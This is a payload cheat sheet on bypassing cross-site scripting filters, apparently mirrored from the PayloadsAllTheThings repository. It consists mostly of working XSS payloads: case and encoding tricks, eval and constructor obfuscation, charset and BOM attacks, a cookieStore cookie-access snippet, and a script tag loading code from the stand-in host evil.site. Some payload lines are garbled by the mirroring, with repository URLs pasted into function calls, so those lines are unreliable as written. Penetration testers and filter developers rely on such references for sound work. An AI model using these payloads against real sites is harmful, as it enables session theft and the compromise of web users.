1-xss-filter-bypass.md (19816B)
1 --- 2 title: "XSS Filter Bypass" 3 topic: "XSS Injection" 4 topicSlug: "xss-injection" 5 sourcePath: "XSS Injection/1 - XSS Filter Bypass.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/XSS%20Injection/1%20-%20XSS%20Filter%20Bypass.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # XSS Filter Bypass 12 13 ## Summary 14 15 - [Bypass Case Sensitive](#bypass-case-sensitive) 16 - [Bypass Tag Blacklist](#bypass-tag-blacklist) 17 - [Bypass Word Blacklist with Code Evaluation](#bypass-word-blacklist-with-code-evaluation) 18 - [Bypass with Incomplete HTML Tag](#bypass-with-incomplete-html-tag) 19 - [Bypass Quotes for String](#bypass-quotes-for-string) 20 - [Bypass Quotes in Script Tag](#bypass-quotes-in-script-tag) 21 - [Bypass Quotes in Mousedown Event](#bypass-quotes-in-mousedown-event) 22 - [Bypass Dot Filter](#bypass-dot-filter) 23 - [Bypass Parenthesis for String](#bypass-parenthesis-for-string) 24 - [Bypass Parenthesis and Semi Colon](#bypass-parenthesis-and-semi-colon) 25 - [Bypass onxxxx= Blacklist](#bypass-onxxxx-blacklist) 26 - [Bypass Space Filter](#bypass-space-filter) 27 - [Bypass Email Filter](#bypass-email-filter) 28 - [Bypass Tel URI Filter](#bypass-tel-uri-filter) 29 - [Bypass document Blacklist](#bypass-document-blacklist) 30 - [Bypass document.cookie Blacklist](#bypass-documentcookie-blacklist) 31 - [Bypass using Javascript Inside a String](#bypass-using-javascript-inside-a-string) 32 - [Bypass using an Alternate Way to Redirect](#bypass-using-an-alternate-way-to-redirect) 33 - [Bypass using an Alternate Way to Execute an Alert](#bypass-using-an-alternate-way-to-execute-an-alert) 34 - [Bypass ">" using Nothing](#bypass--using-nothing) 35 - [Bypass "<" and ">" using < and >](#bypass--and--using--and-) 36 - [Bypass ";" using Another Character](#bypass--using-another-character) 37 - [Bypass using Missing Charset Header](#bypass-using-missing-charset-header) 38 - [Bypass using HTML encoding](#bypass-using-html-encoding) 39 - [Bypass using Katakana](#bypass-using-katakana) 40 - [Bypass using Cuneiform](#bypass-using-cuneiform) 41 - [Bypass using Lontara](#bypass-using-lontara) 42 - [Bypass using ECMAScript6](#bypass-using-ecmascript6) 43 - [Bypass using Octal encoding](#bypass-using-octal-encoding) 44 - [Bypass using Unicode](#bypass-using-unicode) 45 - [Bypass using UTF-7](#bypass-using-utf-7) 46 - [Bypass using UTF-8](#bypass-using-utf-8) 47 - [Bypass using UTF-16be](#bypass-using-utf-16be) 48 - [Bypass using UTF-32](#bypass-using-utf-32) 49 - [Bypass using BOM](#bypass-using-bom) 50 - [Bypass using JSfuck](#bypass-using-jsfuck) 51 - [References](#references) 52 53 ## Bypass Case Sensitive 54 55 To bypass a case-sensitive XSS filter, you can try mixing uppercase and lowercase letters within the tags or function names. 56 57 ```javascript 58 <sCrIpt>alert(1)</ScRipt> 59 <ScrIPt>alert(1)</ScRipT> 60 ``` 61 62 Since many XSS filters only recognize exact lowercase or uppercase patterns, this can sometimes evade detection by tricking simple case-sensitive filters. 63 64 ## Bypass Tag Blacklist 65 66 ```javascript 67 <script x> 68 <script x>alert('XSS')<script y> 69 ``` 70 71 ## Bypass Word Blacklist with Code Evaluation 72 73 ```javascript 74 eval('ale'+'rt(0)'); 75 Function("ale"+"rt(1)")(); 76 new Function`al\ert\`6\``; 77 setTimeout('ale'+'rt(2)'); 78 setInterval('ale'+'rt(10)'); 79 Set.constructor('ale'+'rt(13)')(); 80 Set.constructor`al\x65rt\x2814\x29```; 81 ``` 82 83 ## Bypass with Incomplete HTML Tag 84 85 Works on IE/Firefox/Chrome/Safari 86 87 ```javascript 88 <img src='1' onerror='alert(0)' < 89 ``` 90 91 ## Bypass Quotes for String 92 93 ```javascript 94 String.fromCharCode(88,83,83) 95 ``` 96 97 ## Bypass Quotes in Script Tag 98 99 ```javascript 100 http://localhost/bla.php?test=</script><script>alert(1)</script> 101 <html> 102 <script> 103 <?php echo 'foo="text '.$_GET['test'].'";';`?> 104 </script> 105 </html> 106 ``` 107 108 ## Bypass Quotes in Mousedown Event 109 110 You can bypass a single quote with ' in an on mousedown event handler 111 112 ```javascript 113 <a href="" onmousedown="var name = '';alert(1)//'; alert('smthg')">Link</a> 114 ``` 115 116 ## Bypass Dot Filter 117 118 ```javascript 119 <script>window['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/document%5B%27domain%27%5D)</script> 120 ``` 121 122 Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` 123 124 ```javascript 125 <script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script> 126 ``` 127 128 Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==` 129 130 ## Bypass Parenthesis for String 131 132 ```javascript 133 alert`1` 134 setTimeout`alert\u0028document.domain\u0029`; 135 ``` 136 137 ## Bypass Parenthesis and Semi Colon 138 139 - From @garethheyes 140 141 ```javascript 142 <script>onerror=alert;throw 1337</script> 143 <script>{onerror=alert}throw 1337</script> 144 <script>throw onerror=alert,'some string',123,'haha'</script> 145 ``` 146 147 - From @terjanq 148 149 ```js 150 <script>throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]</script> 151 ``` 152 153 - From @cgvwzq 154 155 ```js 156 <script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script> 157 ``` 158 159 ## Bypass onxxxx Blacklist 160 161 - Use less known tag 162 163 ```html 164 <object onafterscriptexecute=confirm(0)> 165 <object onbeforescriptexecute=confirm(0)> 166 ``` 167 168 - Bypass onxxx= filter with a null byte/vertical tab/Carriage Return/Line Feed 169 170 ```html 171 <img src='1' onerror\x00=alert(0) /> 172 <img src='1' onerror\x0b=alert(0) /> 173 <img src='1' onerror\x0d=alert(0) /> 174 <img src='1' onerror\x0a=alert(0) /> 175 ``` 176 177 - Bypass onxxx= filter with a '/' 178 179 ```js 180 <img src='1' onerror/=alert(0) /> 181 ``` 182 183 ## Bypass Space Filter 184 185 - Bypass space filter with "/" 186 187 ```javascript 188 <img/src='1'/onerror=alert(0)> 189 ``` 190 191 - Bypass space filter with `0x0c/^L` or `0x0d/^M` or `0x0a/^J` or `0x09/^I` 192 193 ```html 194 <svgonload=alert(1)> 195 ``` 196 197 ```ps1 198 $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd 199 00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c <svg.onload.=.al 200 00000010: 6572 7428 3129 0c3e 0a ert(1).>. 201 ``` 202 203 ## Bypass Email Filter 204 205 - [RFC0822 compliant](http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate) 206 207 ```javascript 208 "><svg/onload=confirm(1)>"@x.y 209 ``` 210 211 - [RFC5322 compliant](https://0dave.ch/posts/rfc5322-fun/) 212 213 ```javascript 214 xss@example.com(<img src='x' onerror='alert(document.location)'>) 215 ``` 216 217 ## Bypass Tel URI Filter 218 219 At least 2 RFC mention the `;phone-context=` descriptor: 220 221 - [RFC3966 - The tel URI for Telephone Numbers](https://www.ietf.org/rfc/rfc3966.txt) 222 - [RFC2806 - URLs for Telephone Calls](https://www.ietf.org/rfc/rfc2806.txt) 223 224 ```javascript 225 +330011223344;phone-context=<script>alert(0)</script> 226 ``` 227 228 ## Bypass Document Blacklist 229 230 ```javascript 231 <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> 232 window["doc"+"ument"] 233 ``` 234 235 ## Bypass document.cookie Blacklist 236 237 This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. 238 239 ```js 240 window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); 241 ``` 242 243 ## Bypass using Javascript Inside a String 244 245 ```javascript 246 <script> 247 foo="text </script><script>alert(1)</script>"; 248 </script> 249 ``` 250 251 ## Bypass using an Alternate Way to Redirect 252 253 ```javascript 254 location="http://google.com" 255 document.location = "http://google.com" 256 document.location.href="http://google.com" 257 window.location.assign("http://google.com") 258 window['location']['href']="http://google.com" 259 ``` 260 261 ## Bypass using an Alternate Way to Execute an Alert 262 263 From [@brutelogic](https://twitter.com/brutelogic/status/965642032424407040) tweet. 264 265 ```javascript 266 window['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/0) 267 parent['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/1) 268 self['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/2) 269 top['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/3) 270 this['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/4) 271 frames['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/5) 272 content['alert'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/6) 273 274 [7].map(alert) 275 [8].find(alert) 276 [9].every(alert) 277 [10].filter(alert) 278 [11].findIndex(alert) 279 [12].forEach(alert); 280 ``` 281 282 From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables 283 284 The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**. 285 286 ```javascript 287 c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; } 288 // 5 289 ``` 290 291 Then calling alert is : 292 293 ```javascript 294 Object.keys(self)[5] 295 // "alert" 296 self[Object.keys(self)[5]]("1") // alert("1") 297 ``` 298 299 We can find "alert" with a regular expression like ^a[rel]+t$ : 300 301 ```javascript 302 //bind function alert on new function a() 303 a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} 304 305 // then you can use a() with Object.keys 306 self[Object.keys(self)[a()]]("1") // alert("1") 307 ``` 308 309 Oneliner: 310 311 ```javascript 312 a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1") 313 ``` 314 315 From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet. 316 317 ```javascript 318 prompt`${document.domain}` 319 document.location='java\tscript:alert(1)' 320 document.location='java\rscript:alert(1)' 321 document.location='java\tscript:alert(1)' 322 ``` 323 324 From [@404death](https://twitter.com/404death/status/1011860096685502464) tweet. 325 326 ```javascript 327 eval('ale'+'rt(0)'); 328 Function("ale"+"rt(1)")(); 329 new Function`al\ert\`6\``; 330 331 constructor.constructor("aler"+"t(3)")(); 332 [].filter.constructor('ale'+'rt(4)')(); 333 334 top["al"+"ert"](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/5); 335 top[8680439..toString(30)](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/7); 336 top[/al/.source+/ert/.source](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/8); 337 top['al\x65rt'](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/9); 338 339 open('java'+'script:ale'+'rt(11)'); 340 location='javascript:ale'+'rt(12)'; 341 342 setTimeout`alert\u0028document.domain\u0029`; 343 setTimeout('ale'+'rt(2)'); 344 setInterval('ale'+'rt(10)'); 345 Set.constructor('ale'+'rt(13)')(); 346 Set.constructor`al\x65rt\x2814\x29```; 347 ``` 348 349 Bypass using an alternate way to trigger an alert 350 351 ```javascript 352 var i = document.createElement("iframe"); 353 i.onload = function(){ 354 i.contentWindow.alert(1); 355 } 356 document.appendChild(i); 357 358 // Bypassed security 359 XSSObject.proxy = function (obj, name, report_function_name, exec_original) { 360 var proxy = obj[name]; 361 obj[name] = function () { 362 if (exec_original) { 363 return proxy.apply(this, arguments); 364 } 365 }; 366 XSSObject.lockdown(obj, name); 367 }; 368 XSSObject.proxy(window, 'alert', 'window.alert', false); 369 ``` 370 371 ## Bypass ">" using Nothing 372 373 There is no need to close the tags, the browser will try to fix it. 374 375 ```javascript 376 <svg onload=alert(1)// 377 ``` 378 379 ## Bypass "<" and ">" using < and > 380 381 Use Unicode characters `U+FF1C` and `U+FF1E`, refer to [Bypass using Unicode](#bypass-using-unicode) for more. 382 383 ```javascript 384 <script/src=//evil.site/poc.js> 385 ``` 386 387 ## Bypass ";" using Another Character 388 389 ```javascript 390 'te' * alert('*') * 'xt'; 391 'te' / alert('/') / 'xt'; 392 'te' % alert('%') % 'xt'; 393 'te' - alert('-') - 'xt'; 394 'te' + alert('+') + 'xt'; 395 'te' ^ alert('^') ^ 'xt'; 396 'te' > alert('>') > 'xt'; 397 'te' < alert('<') < 'xt'; 398 'te' == alert('==') == 'xt'; 399 'te' & alert('&') & 'xt'; 400 'te' , alert(',') , 'xt'; 401 'te' | alert('|') | 'xt'; 402 'te' ? alert('ifelsesh') : 'xt'; 403 'te' in alert('in') in 'xt'; 404 'te' instanceof alert('instanceof') instanceof 'xt'; 405 ``` 406 407 ## Bypass using Missing Charset Header 408 409 **Requirements**: 410 411 - Server header missing `charset`: `Content-Type: text/html` 412 413 ### ISO-2022-JP 414 415 ISO-2022-JP uses escape characters to switch between several character sets. 416 417 | Escape | Encoding | 418 | --------- | --------------- | 419 | `\x1B (B` | ASCII | 420 | `\x1B (J` | JIS X 0201 1976 | 421 | `\x1B $@` | JIS X 0208 1978 | 422 | `\x1B $B` | JIS X 0208 1983 | 423 424 Using the [code table](https://en.wikipedia.org/wiki/JIS_X_0201#Codepage_layout), we can find multiple characters that will be transformed when switching from **ASCII** to **JIS X 0201 1976**. 425 426 | Hex | ASCII | JIS X 0201 1976 | 427 | ---- | ----- | --------------- | 428 | 0x5c | `\` | `¥` | 429 | 0x7e | `~` | `‾` | 430 431 **Example**: 432 433 Use `%1b(J` to force convert a `\'` (ascii) in to `¥'` (JIS X 0201 1976), unescaping the quote. 434 435 Payload: `search=%1b(J&lang=en";alert(1)//` 436 437 ## Bypass using HTML Encoding 438 439 ```javascript 440 %26%2397;lert(1) 441 alert 442 ></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)> 443 ``` 444 445 ## Bypass using Katakana 446 447 Using the [aemkei/Katakana](https://github.com/aemkei/katakana.js) library. 448 449 ```javascript 450 javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!ウ+ウ.ウ)[ツ=ア+ウ+ナ+ヘ+ネ+ホ+ヌ+ア+ネ+ウ+ホ][ツ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/%E3%83%9F%2B%E3%83%8F%2B%E3%82%BB%2B%E3%83%9B%2B%E3%83%8D%2B%27%28-~%E3%82%A6)')() 451 ``` 452 453 ## Bypass using Cuneiform 454 455 ```javascript 456 𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 457 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] 458 +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] 459 +𒀟][𒁹](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/%F0%92%80%83%5B%F0%92%80%80%5D%2B%F0%92%80%83%5B%F0%92%88%AB%5D%2B%F0%92%89%BA%5B%F0%92%80%86%5D%2B%F0%92%80%9F%2B%F0%92%8C%90%2B%22%28%F0%92%80%80)")() 460 ``` 461 462 ## Bypass using Lontara 463 464 ```javascript 465 ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/3ac27901c711/XSS%20Injection/%E1%A8%8E%5B%E1%A8%86%5D%2B%E1%A8%8E%5B%E1%A8%8F%5D%2B%E1%A8%8A%5B%E1%A8%83%5D%2B%E1%A8%8B%2B%E1%A8%87%2B%22%28%E1%A8%86)")() 466 ``` 467 468 More alphabets on [aem1k.com/aurebesh.js](http://aem1k.com/aurebesh.js/) 469 470 ## Bypass using ECMAScript6 471 472 ```html 473 <script>alert`1`</script> 474 ``` 475 476 ## Bypass using Octal encoding 477 478 ```javascript 479 javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' 480 ``` 481 482 ## Bypass using Unicode 483 484 This payload takes advantage of Unicode escape sequences to obscure the JavaScript function 485 486 ```html 487 <script>\u0061\u006C\u0065\u0072\u0074(1)</script> 488 ``` 489 490 It uses Unicode escape sequences to represent characters. 491 492 | Unicode | ASCII | 493 | -------- | ----- | 494 | `\u0061` | a | 495 | `\u006C` | l | 496 | `\u0065` | e | 497 | `\u0072` | r | 498 | `\u0074` | t | 499 500 Same thing with these Unicode characters. 501 502 | Unicode (UTF-8 encoded) | Unicode Name | ASCII | ASCII Name | 503 | ----------------------- | ---------------------------- | ----- | -------------- | 504 | `\uFF1C` (%EF%BC%9C) | FULLWIDTH LESSTHAN SIGN | < | LESSTHAN | 505 | `\uFF1E` (%EF%BC%9E) | FULLWIDTH GREATERTHAN SIGN | > | GREATERTHAN | 506 | `\u02BA` (%CA%BA) | MODIFIER LETTER DOUBLE PRIME | " | QUOTATION MARK | 507 | `\u02B9` (%CA%B9) | MODIFIER LETTER PRIME | ' | APOSTROPHE | 508 509 An example payload could be `ʺ><svg onload=alert(/XSS/)>/`, which would look like that after being URL encoded: 510 511 ```javascript 512 %CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/ 513 ``` 514 515 When Unicode characters are converted to another case, they might bypass a filter look for specific keywords. 516 517 | Unicode | Transform | Character | 518 | ------------ | --------------- | --------- | 519 | `İ` (%c4%b0) | `toLowerCase()` | i | 520 | `ı` (%c4%b1) | `toUpperCase()` | I | 521 | `ſ` (%c5%bf) | `toUpperCase()` | S | 522 | `K` (%E2%84) | `toLowerCase()` | k | 523 524 The following payloads become valid HTML tags after being converted. 525 526 ```html 527 <ſvg onload=... > 528 <ıframe id=x onload=> 529 ``` 530 531 ## Bypass using UTF-7 532 533 ```javascript 534 +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4- 535 ``` 536 537 ## Bypass using UTF-8 538 539 ```javascript 540 < = %C0%BC = %E0%80%BC = %F0%80%80%BC 541 > = %C0%BE = %E0%80%BE = %F0%80%80%BE 542 ' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7 543 " = %C0%A2 = %E0%80%A2 = %F0%80%80%A2 544 " = %CA%BA 545 ' = %CA%B9 546 ``` 547 548 ## Bypass using UTF-16be 549 550 ```javascript 551 %00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00 552 \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00> 553 ``` 554 555 ## Bypass using UTF-32 556 557 ```js 558 %00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E 559 ``` 560 561 ## Bypass using BOM 562 563 Byte Order Mark (The page must begin with the BOM character.) 564 BOM character allows you to override charset of the page 565 566 ```js 567 BOM Character for UTF-16 Encoding: 568 Big Endian : 0xFE 0xFF 569 Little Endian : 0xFF 0xFE 570 XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E 571 572 BOM Character for UTF-32 Encoding: 573 Big Endian : 0x00 0x00 0xFE 0xFF 574 Little Endian : 0xFF 0xFE 0x00 0x00 575 XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E 576 ``` 577 578 ## Bypass using JSfuck 579 580 Bypass using [jsfuck](http://www.jsfuck.com/) 581 582 ```javascript 583 [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])() 584 ``` 585 586 ## References 587 588 - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities - Brett Buerhaus (@bbuerhaus) - March 8, 2017](https://web.archive.org/web/20170330144550/https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/)